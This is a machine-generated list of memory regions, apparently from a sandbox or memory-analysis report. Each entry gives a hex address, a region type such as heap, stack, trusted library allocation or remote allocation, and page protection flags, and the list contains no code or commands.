7FFC9DA8C000
trusted library allocation
page execute and read and write
2D40000
heap
page read and write
1B686076000
heap
page read and write
63C0000
trusted library allocation
page read and write
59C04F9000
stack
page read and write
185E8261000
heap
page read and write
7950000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
63C5000
trusted library allocation
page read and write
678D000
trusted library allocation
page read and write
1FA58D35000
heap
page read and write
41285FF000
stack
page read and write
1FA59750000
heap
page read and write
6780000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
B55A000
heap
page read and write
24C0000
heap
page read and write
6A90000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
63E0000
trusted library allocation
page read and write
15DFD702000
heap
page read and write
2500000
remote allocation
page read and write
79D0000
trusted library allocation
page read and write
29F0000
remote allocation
page read and write
1B686071000
heap
page read and write
1B118D3B000
trusted library allocation
page read and write
1FA58C8B000
heap
page read and write
3CF0000
trusted library allocation
page read and write
1B11B752000
trusted library allocation
page read and write
274E000
stack
page read and write
67B0000
trusted library allocation
page read and write
7940000
trusted library allocation
page read and write
59C124E000
stack
page read and write
1B686058000
heap
page read and write
1B118B1A000
heap
page read and write
63BD000
trusted library allocation
page read and write
1A0000
remote allocation
page read and write
425F000
trusted library allocation
page read and write
401000
unkown
page execute read
1FA58DFC000
heap
page read and write
24F0000
remote allocation
page read and write
3CE0000
trusted library allocation
page read and write
2C70000
heap
page read and write
1A1A000
unkown
page read and write
7AD0000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
1E99CD02000
heap
page read and write
67A0000
trusted library allocation
page read and write
1FA58DA6000
heap
page read and write
1FA58DC9000
heap
page read and write
68C0000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
1FA58CFB000
heap
page read and write
63D0000
trusted library allocation
page read and write
1FA58DB2000
heap
page read and write
691E000
trusted library allocation
page read and write
6975000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
6910000
trusted library allocation
page read and write
6400000
trusted library allocation
page read and write
1FA59800000
heap
page read and write
10B4F000
direct allocation
page read and write
6A68000
trusted library allocation
page read and write
1B130E61000
heap
page read and write
6AA0000
trusted library allocation
page read and write
7790000
trusted library allocation
page read and write
8F5D8FE000
stack
page read and write
25D0000
heap
page read and write
1FA58D99000
heap
page read and write
40F5000
trusted library allocation
page read and write
10001000
direct allocation
page execute read
560000
heap
page read and write
2C00000
trusted library allocation
page read and write
6AB0000
trusted library allocation
page read and write
7951000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
6A68000
trusted library allocation
page read and write
1FA59D90000
remote allocation
page read and write
6A67000
trusted library allocation
page read and write
6A50000
unkown
page read and write
2720000
heap
page read and write
6A50000
unkown
page read and write
1FA58D23000
heap
page read and write
1303000
stack
page read and write
1FA5971B000
heap
page read and write
1B11B3FE000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
6A65000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
3D70000
trusted library allocation
page read and write
1FA58C94000
heap
page read and write
691D000
trusted library allocation
page read and write
63D5000
trusted library allocation
page read and write
6757000
trusted library allocation
page read and write
59C067B000
stack
page read and write
6A50000
unkown
page read and write
1FA58DC0000
heap
page read and write
67F0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
67F0000
trusted library allocation
page read and write
1FA58D8D000
heap
page read and write
6780000
trusted library allocation
page read and write
2530000
unkown
page readonly
3008000
heap
page read and write
1FA58D70000
heap
page read and write
1B685F70000
heap
page read and write
1FA58D19000
heap
page read and write
1FA59722000
heap
page read and write
2300000
unkown
page readonly
15453202000
heap
page read and write
41B000
unkown
page readonly
6460000
trusted library allocation
page read and write
6AB5000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
67F0000
trusted library allocation
page read and write
69A6000
trusted library allocation
page read and write
67F0000
trusted library allocation
page read and write
88A000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
2B16000
heap
page read and write
6A50000
trusted library allocation
page read and write
7848000
trusted library allocation
page read and write
1B116CE1000
heap
page read and write
1B116D63000
heap
page read and write
6AA6000
trusted library allocation
page read and write
1BF9F6A0000
heap
page read and write
1B68606B000
heap
page read and write
27A0000
heap
page read and write
1FA58B30000
heap
page read and write
342FFB000
stack
page read and write
40CD000
trusted library allocation
page read and write
1FA58C7A000
heap
page read and write
1B128E84000
trusted library allocation
page read and write
6A00000
trusted library allocation
page read and write
22EC0452000
heap
page read and write
18880230000
heap
page read and write
6AA0000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
3200000
heap
page read and write
1FA58CC0000
heap
page read and write
420000
unkown
page write copy
6AB0000
trusted library allocation
page read and write
6760000
trusted library allocation
page read and write
4FB1000
trusted library allocation
page read and write
67F0000
trusted library allocation
page read and write
15453040000
heap
page read and write
59C07FE000
stack
page read and write
63C0000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
6890000
trusted library allocation
page read and write
B5BC000
heap
page read and write
2E00000
heap
page read and write
698F000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
B2E5000
heap
page read and write
1FA59702000
heap
page read and write
1FA58D25000
heap
page read and write
79C0000
trusted library allocation
page read and write
759E000
stack
page read and write
4127B1B000
stack
page read and write
6A50000
trusted library allocation
page read and write
7FFC9DC80000
trusted library allocation
page read and write
1B11A0F5000
trusted library allocation
page read and write
470000
heap
page read and write
4245000
trusted library allocation
page read and write
B5BE000
heap
page read and write
67F0000
trusted library allocation
page read and write
1FA58D29000
heap
page read and write
79B0000
trusted library allocation
page read and write
1D4FECC0000
heap
page read and write
1B1190E4000
trusted library allocation
page read and write
25458029000
heap
page read and write
63E0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
1FA58CDA000
heap
page read and write
7830000
trusted library allocation
page read and write
3550000
heap
page read and write
7820000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
7842000
trusted library allocation
page read and write
1FA5975C000
heap
page read and write
7950000
trusted library allocation
page read and write
3310000
trusted library allocation
page read and write
7700000
trusted library allocation
page execute and read and write
6AA0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
2F3E000
stack
page read and write
1FA58CEA000
heap
page read and write
7B98000
trusted library allocation
page read and write
78A0000
trusted library allocation
page read and write
6AA5000
unkown
page read and write
67B0000
trusted library allocation
page read and write
1FA58CDC000
heap
page read and write
1FA58C68000
heap
page read and write
1B1191A9000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
67C0000
trusted library allocation
page read and write
1FA59D90000
remote allocation
page read and write
1FA58DDE000
heap
page read and write
67A8000
trusted library allocation
page read and write
29A0000
heap
page read and write
7810000
trusted library allocation
page read and write
7940000
trusted library allocation
page read and write
6E0000
heap
page read and write
3640000
trusted library allocation
page readonly
6400000
trusted library allocation
page read and write
1FA58D52000
heap
page read and write
1FA58D28000
heap
page read and write
13AB000
unkown
page write copy
1888023F000
heap
page read and write
1D4FEC50000
heap
page read and write
1B131300000
heap
page read and write
22EC0370000
heap
page read and write
7680000
trusted library allocation
page read and write
2541AE00000
heap
page read and write
6A60000
trusted library allocation
page read and write
427000
unkown
page readonly
1B116C90000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6A67000
trusted library allocation
page read and write
67C0000
trusted library allocation
page read and write
7890000
trusted library allocation
page read and write
7FFC9DA86000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
7760000
trusted library allocation
page read and write
6952000
trusted library allocation
page read and write
1F4A9FB0000
remote allocation
page read and write
3539000
heap
page read and write
76BF000
trusted library allocation
page read and write
1017A000
direct allocation
page read and write
67C0000
trusted library allocation
page read and write
68C0000
trusted library allocation
page read and write
63F0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
185E8242000
heap
page read and write
21E000
stack
page read and write
7FFC9DC10000
trusted library allocation
page read and write
870000
heap
page read and write
63C0000
trusted library allocation
page read and write
AAD2000
unkown
page read and write
1FA5981B000
heap
page read and write
7950000
trusted library allocation
page read and write
67C0000
trusted library allocation
page read and write
6A52000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
1FA58DF9000
heap
page read and write
6A10000
trusted library allocation
page read and write
2DE0000
trusted library allocation
page read and write
342BDC000
stack
page read and write
7530000
trusted library allocation
page read and write
1B116D28000
heap
page read and write
6780000
trusted library allocation
page read and write
67B3000
trusted library allocation
page read and write
185E8262000
heap
page read and write
185E823C000
heap
page read and write
1FA58C9C000
heap
page read and write
CF3F000
stack
page read and write
1B686C30000
heap
page read and write
FC0000
heap
page read and write
7FFC9DC50000
trusted library allocation
page read and write
1B118CB4000
trusted library allocation
page read and write
1FA5975A000
heap
page read and write
82F297C000
stack
page read and write
1FA58CF2000
heap
page read and write
2F1C000
stack
page read and write
65E1000
heap
page read and write
645D000
stack
page read and write
79A7000
trusted library allocation
page read and write
1E99CCC3000
heap
page read and write
7550000
trusted library allocation
page read and write
ACF9E7E000
stack
page read and write
32E0000
heap
page read and write
68D4000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
67C0000
trusted library allocation
page read and write
1FA5975F000
heap
page read and write
6A5E000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
6A00000
trusted library allocation
page read and write
1FA58C86000
heap
page read and write
640F000
trusted library allocation
page read and write
6AA7000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
22EC0413000
heap
page read and write
7964000
trusted library allocation
page read and write
6760000
trusted library allocation
page read and write
1FA58D24000
heap
page read and write
27F0000
heap
page read and write
42D0000
trusted library allocation
page read and write
6A55000
trusted library allocation
page read and write
79EA000
trusted library allocation
page read and write
1FA58C82000
heap
page read and write
67A0000
trusted library allocation
page read and write
7BB0000
trusted library allocation
page read and write
1B118CB0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
2541AE28000
heap
page read and write
6A60000
trusted library allocation
page read and write
1FA58D6A000
heap
page read and write
22EC03C0000
heap
page read and write
6AA0000
trusted library allocation
page read and write
1FA58CF0000
heap
page read and write
6880000
trusted library allocation
page read and write
1FA58DCC000
heap
page read and write
67C0000
trusted library allocation
page read and write
1FA58C90000
heap
page read and write
1B11A0FD000
trusted library allocation
page read and write
7530000
trusted library allocation
page read and write
41D3000
trusted library allocation
page read and write
1B130F1E000
heap
page read and write
DD30000
trusted library allocation
page read and write
696B000
trusted library allocation
page read and write
1B130D90000
heap
page execute and read and write
1FA58D13000
heap
page read and write
1FA58C8D000
heap
page read and write
7950000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
1FA59776000
heap
page read and write
1B116D2F000
heap
page read and write
343279000
stack
page read and write
63E4000
trusted library allocation
page read and write
15453302000
heap
page read and write
6A50000
trusted library allocation
page read and write
7BA0000
trusted library allocation
page read and write
3000000
heap
page read and write
4410000
trusted library allocation
page read and write
2CF0000
trusted library allocation
page read and write
3340000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
1FA58D66000
heap
page read and write
4332000
trusted library allocation
page read and write
1B118C90000
trusted library allocation
page read and write
1D4FEE54000
heap
page read and write
1FA58CDE000
heap
page read and write
63C0000
trusted library allocation
page read and write
1FA58D17000
heap
page read and write
6A50000
unkown
page read and write
2E2F000
stack
page read and write
7960000
trusted library allocation
page read and write
2920000
trusted library allocation
page read and write
6787000
trusted library allocation
page read and write
34347A000
stack
page read and write
67A0000
trusted library allocation
page read and write
63E5000
trusted library allocation
page read and write
2541AE02000
heap
page read and write
1FA58DAC000
heap
page read and write
4F51000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
1FA58CAB000
heap
page read and write
1F4A9FB0000
remote allocation
page read and write
7520000
trusted library allocation
page read and write
2440000
heap
page read and write
2B68000
heap
page read and write
67E0000
trusted library allocation
page read and write
3350000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
6A60000
unkown
page read and write
6AA0000
trusted library allocation
page read and write
1FA5974E000
heap
page read and write
8F5D54C000
stack
page read and write
6AA6000
trusted library allocation
page read and write
63D0000
trusted library allocation
page read and write
1B68618E000
heap
page read and write
41DE000
trusted library allocation
page read and write
417F000
trusted library allocation
page read and write
6760000
trusted library allocation
page read and write
24B0000
heap
page read and write
7740000
trusted library allocation
page read and write
2CD000
stack
page read and write
67F0000
trusted library allocation
page read and write
6A68000
trusted library allocation
page read and write
63E5000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
7FFC9D9DD000
trusted library allocation
page execute and read and write
4B60000
heap
page read and write
6A60000
trusted library allocation
page read and write
1B130E8A000
heap
page read and write
6AA0000
trusted library allocation
page read and write
6750000
trusted library allocation
page read and write
41280FF000
stack
page read and write
6408000
trusted library allocation
page read and write
2AE0000
unkown
page readonly
6780000
trusted library allocation
page read and write
7BC0000
trusted library allocation
page read and write
1FA58CE8000
heap
page read and write
2C4DE7C000
stack
page read and write
7710000
trusted library allocation
page read and write
1B116CA8000
heap
page read and write
6A50000
trusted library allocation
page read and write
5CC02AB000
stack
page read and write
2700000
heap
page read and write
6780000
trusted library allocation
page read and write
6A66000
trusted library allocation
page read and write
63D8000
trusted library allocation
page read and write
1B118C90000
trusted library allocation
page read and write
750000
heap
page read and write
1FA58D39000
heap
page read and write
1B686BE5000
heap
page read and write
7A90000
trusted library allocation
page read and write
7FFC9DAF0000
trusted library allocation
page execute and read and write
680000
heap
page read and write
7660000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
1FA597A7000
heap
page read and write
1FA58DFF000
heap
page read and write
7680000
trusted library allocation
page read and write
B52A000
heap
page read and write
69A4000
trusted library allocation
page read and write
654B000
stack
page read and write
784D000
trusted library allocation
page read and write
65DA000
stack
page read and write
68B0000
trusted library allocation
page read and write
15453213000
heap
page read and write
1B11A4A4000
trusted library allocation
page read and write
1BF9F700000
heap
page read and write
1B685FC0000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
67F0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
6A60000
unkown
page read and write
7BE0000
trusted library allocation
page execute and read and write
7950000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
1B116C85000
heap
page read and write
2082000
trusted library allocation
page read and write
1B686B43000
heap
page read and write
2AC0000
unkown
page readonly
6AB0000
trusted library allocation
page read and write
6999000
trusted library allocation
page read and write
1479000
unkown
page read and write
1FA58D97000
heap
page read and write
6A60000
unkown
page read and write
2CEE000
stack
page read and write
6790000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
7FFC9D9D3000
trusted library allocation
page execute and read and write
67A0000
trusted library allocation
page read and write
1B1187A0000
trusted library allocation
page read and write
1FA58D4F000
heap
page read and write
2B90000
heap
page read and write
7660000
trusted library allocation
page read and write
7810000
trusted library allocation
page read and write
2541AE75000
heap
page read and write
7960000
trusted library allocation
page read and write
1FA58CB7000
heap
page read and write
2AE0000
unkown
page readonly
B612000
heap
page read and write
1FA59772000
heap
page read and write
185E8241000
heap
page read and write
6A69000
trusted library allocation
page read and write
B345000
heap
page read and write
6A4B000
trusted library allocation
page read and write
7FFC9DAB6000
trusted library allocation
page execute and read and write
1B686092000
heap
page read and write
2D10000
heap
page read and write
6A6A000
trusted library allocation
page read and write
3EAE000
stack
page read and write
7750000
trusted library allocation
page read and write
2AD0000
unkown
page readonly
2500000
remote allocation
page read and write
2541AE6C000
heap
page read and write
15DFD613000
heap
page read and write
2C00000
trusted library allocation
page read and write
679B000
trusted library allocation
page read and write
1D4FEC60000
heap
page read and write
1FA58CEE000
heap
page read and write
6790000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
4443000
trusted library allocation
page read and write
57093FD000
stack
page read and write
1FA58D63000
heap
page read and write
659D000
stack
page read and write
6A50000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
1FA59711000
heap
page read and write
3435FF000
stack
page read and write
3D00000
trusted library allocation
page execute and read and write
34C0000
heap
page read and write
79E0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
22EC044A000
heap
page read and write
15DFD718000
heap
page read and write
2C3A000
stack
page read and write
420000
unkown
page read and write
1E99CB70000
heap
page read and write
6760000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
B554000
heap
page read and write
1B686C27000
heap
page read and write
67F0000
trusted library allocation
page read and write
22EC0360000
heap
page read and write
68D0000
trusted library allocation
page read and write
7FFC9D9D4000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
B5C8000
heap
page read and write
63D0000
trusted library allocation
page read and write
7A95000
unkown
page read and write
1FA59817000
heap
page read and write
6AD000
heap
page read and write
6AA0000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
68E0000
trusted library allocation
page read and write
6AA7000
trusted library allocation
page read and write
1FA59752000
heap
page read and write
2B60000
heap
page read and write
1D4FEDC0000
trusted library allocation
page read and write
185E8284000
heap
page read and write
7810000
trusted library allocation
page read and write
1FA59756000
heap
page read and write
2C4E17E000
stack
page read and write
185E8243000
heap
page read and write
69F3000
trusted library allocation
page read and write
1D4FEE13000
heap
page read and write
3EEF000
stack
page read and write
6A50000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
2950000
heap
page read and write
7852000
trusted library allocation
page read and write
1FA58D00000
heap
page read and write
367C000
heap
page read and write
63C5000
trusted library allocation
page read and write
59C02FD000
stack
page read and write
1FA58DDD000
heap
page read and write
6A50000
unkown
page read and write
690B000
trusted library allocation
page read and write
7950000
trusted library allocation
page read and write
2AF0000
unkown
page read and write
6810000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
6AA5000
trusted library allocation
page read and write
15453229000
heap
page read and write
15DFD4A0000
heap
page read and write
6820000
trusted library allocation
page read and write
7677000
trusted library allocation
page read and write
1FA5977F000
heap
page read and write
6AA0000
trusted library allocation
page read and write
6890000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
63C8000
trusted library allocation
page read and write
6942000
trusted library allocation
page read and write
79C0000
trusted library allocation
page read and write
40ED000
trusted library allocation
page read and write
3F51000
trusted library allocation
page read and write
33DE000
stack
page read and write
6780000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
1B116D4B000
heap
page read and write
6405000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
15DFD713000
heap
page read and write
67D0000
trusted library allocation
page execute and read and write
6AA0000
trusted library allocation
page read and write
19C000
stack
page read and write
367E000
heap
page read and write
7B50000
trusted library allocation
page read and write
1FA58C95000
heap
page read and write
6AA8000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
B570000
heap
page read and write
63C1000
trusted library allocation
page read and write
1E99D700000
heap
page read and write
1FA58C6E000
heap
page read and write
570987F000
stack
page read and write
6A50000
trusted library allocation
page read and write
1FA58CBF000
heap
page read and write
1E99CC87000
heap
page read and write
619CCFE000
stack
page read and write
640C000
trusted library allocation
page read and write
7980000
trusted library allocation
page read and write
79E2000
trusted library allocation
page read and write
437A000
trusted library allocation
page read and write
6A30000
trusted library allocation
page read and write
6A60000
unkown
page read and write
25458041000
heap
page read and write
2541AD40000
heap
page read and write
63E5000
trusted library allocation
page read and write
3D0000
heap
page read and write
7C50000
trusted library allocation
page read and write
290F000
stack
page read and write
330000
heap
page read and write
7FFC9DB8C000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
33FF000
stack
page read and write
442F000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
1FA58CA6000
heap
page read and write
6AA0000
trusted library allocation
page read and write
65F8000
heap
page read and write
2C40000
heap
page read and write
6AA0000
trusted library allocation
page read and write
3CDD000
stack
page read and write
B142000
unkown
page read and write
63C0000
trusted library allocation
page read and write
1FA59747000
heap
page read and write
15DFD658000
heap
page read and write
79A0000
trusted library allocation
page read and write
185E8260000
heap
page read and write
7520000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
2DCA000
heap
page read and write
4115000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
1FA58D22000
heap
page read and write
67A0000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
63E5000
trusted library allocation
page read and write
185E8277000
heap
page read and write
29FF000
stack
page read and write
1FA58D47000
heap
page read and write
1FA58DAD000
heap
page read and write
2990000
heap
page read and write
67C0000
trusted library allocation
page read and write
687F000
stack
page read and write
1B686013000
heap
page read and write
7700000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
6860000
trusted library allocation
page read and write
4385000
trusted library allocation
page read and write
34357E000
stack
page read and write
7FFC9DBC0000
trusted library allocation
page execute and read and write
15DFD657000
heap
page read and write
23D0000
trusted library allocation
page read and write
1FA58C83000
heap
page read and write
7C10000
trusted library allocation
page read and write
7980000
trusted library allocation
page read and write
1FA58CC6000
heap
page read and write
3658000
trusted library allocation
page read and write
1FA58DB9000
heap
page read and write
67C0000
trusted library allocation
page read and write
1FA59803000
heap
page read and write
7980000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
7FFC9DD20000
trusted library allocation
page read and write
7940000
trusted library allocation
page read and write
3380000
trusted library allocation
page read and write
2940000
remote allocation
page read and write
698F000
trusted library allocation
page read and write
185E8249000
heap
page read and write
7A00000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
1FA58CEB000
heap
page read and write
69A6000
trusted library allocation
page read and write
1F81000
trusted library allocation
page read and write
6AB8000
trusted library allocation
page read and write
7520000
trusted library allocation
page read and write
1E99CCCB000
heap
page read and write
4404000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
63E0000
trusted library allocation
page read and write
327C000
stack
page read and write
40E1000
trusted library allocation
page read and write
2C3D000
stack
page read and write
69CE000
trusted library allocation
page read and write
1FA58BD0000
trusted library allocation
page read and write
7940000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
6A65000
trusted library allocation
page read and write
6A0000
heap
page read and write
1B116CFD000
heap
page read and write
7A00000
trusted library allocation
page read and write
6A10000
trusted library allocation
page execute and read and write
59C06FE000
stack
page read and write
7FFC9DC20000
trusted library allocation
page read and write
7530000
trusted library allocation
page read and write
2B60000
trusted library allocation
page read and write
6400000
trusted library allocation
page read and write
283D000
stack
page read and write
6AA0000
trusted library allocation
page read and write
63E0000
trusted library allocation
page read and write
6952000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
1F4AA400000
heap
page read and write
69AB000
trusted library allocation
page read and write
6AA6000
trusted library allocation
page read and write
1FA58CD7000
heap
page read and write
6A40000
trusted library allocation
page read and write
43B1000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
6750000
trusted library allocation
page read and write
1FA58D8E000
heap
page read and write
1FA58DA3000
heap
page read and write
1FA59778000
heap
page read and write
22AD000
stack
page read and write
1FA58D78000
heap
page read and write
4326000
trusted library allocation
page read and write
6AB0000
trusted library allocation
page read and write
6AA6000
trusted library allocation
page read and write
15DFD440000
heap
page read and write
6790000
trusted library allocation
page read and write
2ACC000
stack
page read and write
1B116D54000
heap
page read and write
290E000
stack
page read and write
18880180000
heap
page read and write
2C4E27E000
stack
page read and write
63E0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
4365000
trusted library allocation
page read and write
254588A0000
remote allocation
page read and write
7A60000
trusted library allocation
page read and write
289B000
heap
page read and write
1FA58D42000
heap
page read and write
63E0000
trusted library allocation
page read and write
59BFFAE000
stack
page read and write
6A55000
trusted library allocation
page read and write
1B116C40000
heap
page read and write
3F40000
heap
page read and write
2D9E000
unkown
page read and write
1F4AA0B0000
heap
page read and write
D53C000
stack
page read and write
30D0000
heap
page read and write
1B118CA0000
trusted library allocation
page read and write
1FA59765000
heap
page read and write
63B0000
trusted library allocation
page read and write
3617000
heap
page read and write
63D0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
2D18000
heap
page read and write
6AA0000
trusted library allocation
page read and write
1B11B43D000
trusted library allocation
page read and write
1FA58CA7000
heap
page read and write
6A54000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
76C0000
trusted library allocation
page read and write
1B118CD0000
heap
page execute and read and write
7520000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
1FA58DF2000
heap
page read and write
67A0000
trusted library allocation
page read and write
25457F80000
heap
page read and write
6AA5000
trusted library allocation
page read and write
6A00000
trusted library allocation
page read and write
3D20000
trusted library allocation
page read and write
2530000
unkown
page readonly
6A60000
trusted library allocation
page read and write
34DE000
stack
page read and write
10B53000
direct allocation
page readonly
1B685FA0000
trusted library allocation
page read and write
69A7000
trusted library allocation
page read and write
2B7D000
stack
page read and write
B5A6000
heap
page read and write
1B118790000
trusted library allocation
page read and write
15DFD5A0000
trusted library allocation
page read and write
2EDD000
stack
page read and write
1E99CCE1000
heap
page read and write
67E0000
trusted library allocation
page execute and read and write
1FA58B40000
heap
page read and write
6A60000
trusted library allocation
page read and write
1E99CBD0000
heap
page read and write
6780000
trusted library allocation
page read and write
327F000
stack
page read and write
35B0000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
423B000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
67F0000
trusted library allocation
page read and write
2A8D000
stack
page read and write
1FA58D26000
heap
page read and write
32D0000
remote allocation
page read and write
38B0000
heap
page read and write
D902F8B000
stack
page read and write
B51E000
stack
page read and write
41CB000
trusted library allocation
page read and write
25458000000
heap
page read and write
6AA0000
trusted library allocation
page read and write
7980000
trusted library allocation
page read and write
7A40000
trusted library allocation
page read and write
67B0000
trusted library allocation
page read and write
65FD000
heap
page read and write
7960000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
7940000
trusted library allocation
page read and write
43C4000
trusted library allocation
page read and write
1FA58D9F000
heap
page read and write
1FA58DA0000
heap
page read and write
6AA0000
trusted library allocation
page read and write
5708BFB000
stack
page read and write
ACFA37F000
stack
page read and write
238E000
unkown
page read and write
29AB000
heap
page read and write
1B686A02000
heap
page read and write
7A1E000
stack
page read and write
7720000
trusted library allocation
page read and write
7997000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
3340000
trusted library allocation
page read and write
63E0000
trusted library allocation
page read and write
7830000
trusted library allocation
page read and write
6A55000
trusted library allocation
page read and write
2E8E000
stack
page read and write
1B68603C000
heap
page read and write
7670000
unkown
page read and write
7F0000
heap
page read and write
6AA0000
trusted library allocation
page read and write
1F4AA117000
heap
page read and write
344A000
heap
page read and write
6890000
trusted library allocation
page read and write
2AD0000
unkown
page readonly
2D71000
trusted library allocation
page read and write
2550000
heap
page read and write
341F000
stack
page read and write
422A000
trusted library allocation
page read and write
300E000
stack
page read and write
68E0000
trusted library allocation
page read and write
B607000
heap
page read and write
6460000
trusted library allocation
page read and write
2FA0000
heap
page read and write
6A60000
trusted library allocation
page read and write
41EA000
trusted library allocation
page read and write
64C9000
stack
page read and write
43E4000
trusted library allocation
page read and write
2BBC000
stack
page read and write
D11000
unkown
page execute read
29E0000
heap
page read and write
6A60000
trusted library allocation
page read and write
24F0000
remote allocation
page read and write
1888023D000
heap
page read and write
B5BC000
heap
page read and write
2940000
remote allocation
page read and write
7940000
trusted library allocation
page read and write
7950000
trusted library allocation
page read and write
1A0000
remote allocation
page read and write
3430FF000
stack
page read and write
6A6A000
trusted library allocation
page read and write
1B130E6E000
heap
page read and write
1B11B70F000
trusted library allocation
page read and write
6A67000
trusted library allocation
page read and write
3350000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
1FA58D4A000
heap
page read and write
25D0000
trusted library allocation
page read and write
2DCE000
stack
page read and write
6AA0000
trusted library allocation
page read and write
67F0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
185E8257000
heap
page read and write
1B686B22000
heap
page read and write
6AA0000
trusted library allocation
page read and write
7C40000
trusted library allocation
page read and write
1B686055000
heap
page read and write
7B84000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
400000
unkown
page readonly
DD31000
trusted library allocation
page read and write
59C087B000
stack
page read and write
1FA58D84000
heap
page read and write
63E0000
trusted library allocation
page read and write
6AB9000
trusted library allocation
page read and write
619C97E000
stack
page read and write
2CAF000
unkown
page read and write
D9036FE000
stack
page read and write
6A66000
trusted library allocation
page read and write
7820000
trusted library allocation
page read and write
68C0000
trusted library allocation
page read and write
6AA5000
unkown
page read and write
67C0000
trusted library allocation
page read and write
1FA58D5A000
heap
page read and write
2890000
heap
page read and write
79E0000
trusted library allocation
page read and write
3350000
trusted library allocation
page read and write
291C000
stack
page read and write
7540000
trusted library allocation
page read and write
2F40000
remote allocation
page read and write
7AF0000
trusted library allocation
page read and write
10B54000
direct allocation
page read and write
1FA58C78000
heap
page read and write
6410000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
B2E0000
heap
page read and write
7A07000
trusted library allocation
page read and write
1D4FEE29000
heap
page read and write
309C000
stack
page read and write
123C000
stack
page read and write
DD31000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
1B6861E5000
heap
page read and write
6790000
trusted library allocation
page read and write
1FA58DB6000
heap
page read and write
2880000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
5CC08FC000
stack
page read and write
1FA5974D000
heap
page read and write
1B11B724000
trusted library allocation
page read and write
15DFD647000
heap
page read and write
420000
unkown
page read and write
